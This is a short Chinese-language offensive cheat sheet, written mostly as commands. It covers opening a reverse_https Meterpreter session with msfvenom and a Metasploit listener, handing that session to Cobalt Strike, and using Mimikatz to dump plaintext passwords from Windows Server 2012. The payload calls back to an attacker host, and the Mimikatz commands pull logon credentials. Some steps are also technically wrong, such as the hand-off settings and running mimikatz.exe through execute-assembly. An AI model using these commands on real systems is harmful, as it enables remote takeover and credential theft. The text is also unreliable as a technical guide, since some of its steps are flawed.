cs与msf权限传递
1. 在Metasploit中获取会话
# 在Metasploit中设置监听器
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST [Metasploit主机IP]
set LPORT [选择的端口]
exploit# 在目标系统上执行Metasploit生成的payload
# 例如,使用msfvenom生成一个可执行文件
msfvenom -p windows/meterpreter/reverse_https LHOST=[Metasploit主机IP] LPORT=[选择的端口] -f exe > payload.exe
2. 在Cobalt Strike中接收会话
# 在Cobalt Strike中设置监听器
# 打开Cobalt Strike客户端,连接到服务端
# 创建一个新的监听器,选择HTTPS Beacon
# 设置好IP和端口,保存并启动监听器# 在Metasploit中获取的会话上线到Cobalt Strike
# 在Metasploit中,使用以下命令将会话传递到Cobalt Strike
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_https
set LHOST [Metasploit主机IP]
set LPORT [选择的端口]
set SESSION [Metasploit中的会话ID]
set DisablePayloadHandler true
exploit
mimikatz抓取win2012明文密码
1. 在Cobalt Strike中上传Mimikatz
# 在Cobalt Strike中上传Mimikatz到目标系统
upload /path/to/mimikatz.exe
2. 在目标系统上执行Mimikatz
# 在Cobalt Strike的命令行中执行Mimikatz
execute-assembly /path/to/mimikatz.exe
3. 使用Mimikatz抓取明文密码
# 在Mimikatz中,使用以下命令抓取明文密码
privilege::debug
sekurlsa::logonpasswords